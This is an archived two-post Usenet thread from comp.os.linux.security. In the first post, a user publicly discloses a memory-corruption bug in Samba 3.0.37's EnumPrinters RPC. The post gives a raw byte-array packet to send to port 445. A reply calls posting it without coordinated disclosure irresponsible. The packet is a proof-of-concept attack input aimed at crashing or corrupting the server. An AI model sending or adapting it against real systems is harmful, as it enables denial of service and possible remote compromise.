Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > comp.os.linux.security > #646 > unrolled thread
| Started by | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| First post | 2015-05-18 18:56 +0200 |
| Last post | 2015-05-19 18:04 +0100 |
| Articles | 2 — 2 participants |
Back to article view | Back to comp.os.linux.security
[Samba 3.0.37] EnumPrinters memory consumption "Gabriele Avosani" <g.avosani@gmail.com> - 2015-05-18 18:56 +0200
Re: [Samba 3.0.37] EnumPrinters memory consumption Richard Kettlewell <rjk@greenend.org.uk> - 2015-05-19 18:04 +0100
| From | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| Date | 2015-05-18 18:56 +0200 |
| Subject | [Samba 3.0.37] EnumPrinters memory consumption |
| Message-ID | <mjd5k6$594$1@speranza.aioe.org> |
Hello, there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function (anonymous access), the bug is in parse_prs.c:398, we take control of length and source pointer of a memcpy, leading to memory corruption, very fast exhaustion of resources (block of computer very easy) and, probably, remote code execution. This is the packet code to be sent to port 445, EnumPrinters rpc function, opcode 0x0. char fr1[]="\x0a\x00\x00\x00\x21\xd3\x9f\x98\x06\x00\x00\x00\x00\x00\x00\x00" "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" "\xd8\x50\x60\x00\x21\x33\x33\x73\x00\x00\x00\x01\x42\x42\x06\x20" "\x0a\x00\x00\x00\x21\xd3\x9f\x28\x06\x00\x00\x00\x00\x00\x00\x00" "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" "\xd8\x50\x60\x20\x21\x33\x33\x2a\x40\x40\x40\x20\x45\x45\x06\x20" "\x00\x00" Gabriele Avosani P.S. Looking for job as remote programmer (short and long terms). Php, Perl, Java, C/C++ and more (Linux and Windows), thanks in advance.
[toc] | [next] | [standalone]
| From | Richard Kettlewell <rjk@greenend.org.uk> |
|---|---|
| Date | 2015-05-19 18:04 +0100 |
| Message-ID | <wwv1tic1ou1.fsf@l1AntVDjLrnP7Td3DQJ8ynzIq3lJMueXf87AxnpFoA.invalid> |
| In reply to | #646 |
"Gabriele Avosani" <g.avosani@gmail.com> writes: > there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function > (anonymous access), the bug is in parse_prs.c:398, we take control of length > and source pointer of a memcpy, leading to memory corruption, very fast > exhaustion of resources (block of computer very easy) and, probably, remote > code execution. samba.org says the latest version is 4.1.something. If you think that version is also vulnerable, you should contact the Samba team, ideally in private. Posting vulnerabilities to Usenet without allowing any time for a fix to be deployed is rather irresponsible. -- http://www.greenend.org.uk/rjk/
[toc] | [prev] | [standalone]
Back to top | Article view | comp.os.linux.security
csiph-web